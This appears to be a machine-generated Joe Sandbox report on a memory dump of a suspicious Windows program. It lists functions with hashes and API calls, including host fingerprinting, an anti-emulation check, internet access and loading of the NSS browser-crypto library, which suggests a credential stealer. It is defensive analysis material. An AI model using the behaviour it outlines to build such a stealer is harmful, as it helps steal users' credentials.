Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 661a33c798242dc4c855162a281f7223e62ff97b1e9cbda6c059c4df2bfac356
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 661a33c798242dc4c855162a281f7223e62ff97b1e9cbda6c059c4df2bfac356
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02D75648), ref: 00404ED9

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: 56f25529f5d2fe15761f66cdc0fa59a4b91effbd32d2972b1c0d5a2599f8e217
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: 56f25529f5d2fe15761f66cdc0fa59a4b91effbd32d2972b1c0d5a2599f8e217
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02D75648), ref: 00404ED9

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: f86264bb006207cf30b24e074904da5c2b538c0f28fefb805e06bd21fcc2ffcf
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: f86264bb006207cf30b24e074904da5c2b538c0f28fefb805e06bd21fcc2ffcf
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02D75648), ref: 00404ED9

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 7dadc5b4cd3413107dca7a81a3c4ca659646e7b67e58f26f151010d40cbba245
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: 7dadc5b4cd3413107dca7a81a3c4ca659646e7b67e58f26f151010d40cbba245
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004043B0 Relevance: 2.5, APIs: 2, Instructions: 44memorystringCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,004136BB), ref: 004043C0
strlen.MSVCRT ref: 004043F9

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: AllocLocalstrlen
String ID:
API String ID: 3248042016-0
Opcode ID: 4f4c7e3a00c53ef744ebddccc8c6c0a315297a198edb814f0ef85295cdc2db43
Instruction ID: 5af89fa31fe4aa663c9d177b6e3ebda1ab4628413c011fa38054673e46112481
Opcode Fuzzy Hash: 4f4c7e3a00c53ef744ebddccc8c6c0a315297a198edb814f0ef85295cdc2db43
Instruction Fuzzy Hash: 8B1152B4A04248EFCB04CF98D8D0BAEBBF5FF89305F148095E909A7341C335AA50CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: be0baeed0cddd4351448173c283cfc01bb64caa5fd23e79b8f8fa40c9ce29eef
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: be0baeed0cddd4351448173c283cfc01bb64caa5fd23e79b8f8fa40c9ce29eef
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c7c707a7e520d0d67f3c3eb60cec8b26d92ba5516e27f83f13e6734a7a38c3a4
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: c7c707a7e520d0d67f3c3eb60cec8b26d92ba5516e27f83f13e6734a7a38c3a4
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02D755D8,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6C7F6E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C942120,6C7F7E60), ref: 6C7F6EBC
TlsGetValue.KERNEL32 ref: 6C7F6EDF
EnterCriticalSection.KERNEL32(?), ref: 6C7F6EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C7F6F25

Part of subcall function 6C7CA900: TlsGetValue.KERNEL32(00000000,?,6C9414E4,?,6C764DD9), ref: 6C7CA90F
Part of subcall function 6C7CA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C7CA94F

PR_Unlock.NSS3 ref: 6C7F6F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C7F6FA9
TlsGetValue.KERNEL32 ref: 6C7F70B4
EnterCriticalSection.KERNEL32(?), ref: 6C7F70C8
PR_CallOnce.NSS3(6C9424C0,6C837590), ref: 6C7F7104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7F7117
SECOID_Init.NSS3 ref: 6C7F7128
PORT_Alloc_Util.NSS3(00000057), ref: 6C7F714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F71A9
PR_NotifyAllCondVar.NSS3 ref: 6C7F71CF
PR_Unlock.NSS3 ref: 6C7F71DD
free.MOZGLUE(?), ref: 6C7F71EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7F7208
free.MOZGLUE(00000000), ref: 6C7F7221
free.MOZGLUE(00000001), ref: 6C7F7235
TlsGetValue.KERNEL32 ref: 6C7F724A
EnterCriticalSection.KERNEL32(?), ref: 6C7F725E
PR_NotifyCondVar.NSS3 ref: 6C7F7273
PR_Unlock.NSS3 ref: 6C7F7281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C7F7291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F72B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F72D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F72E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F7301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F7310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F7335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F7344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F7363
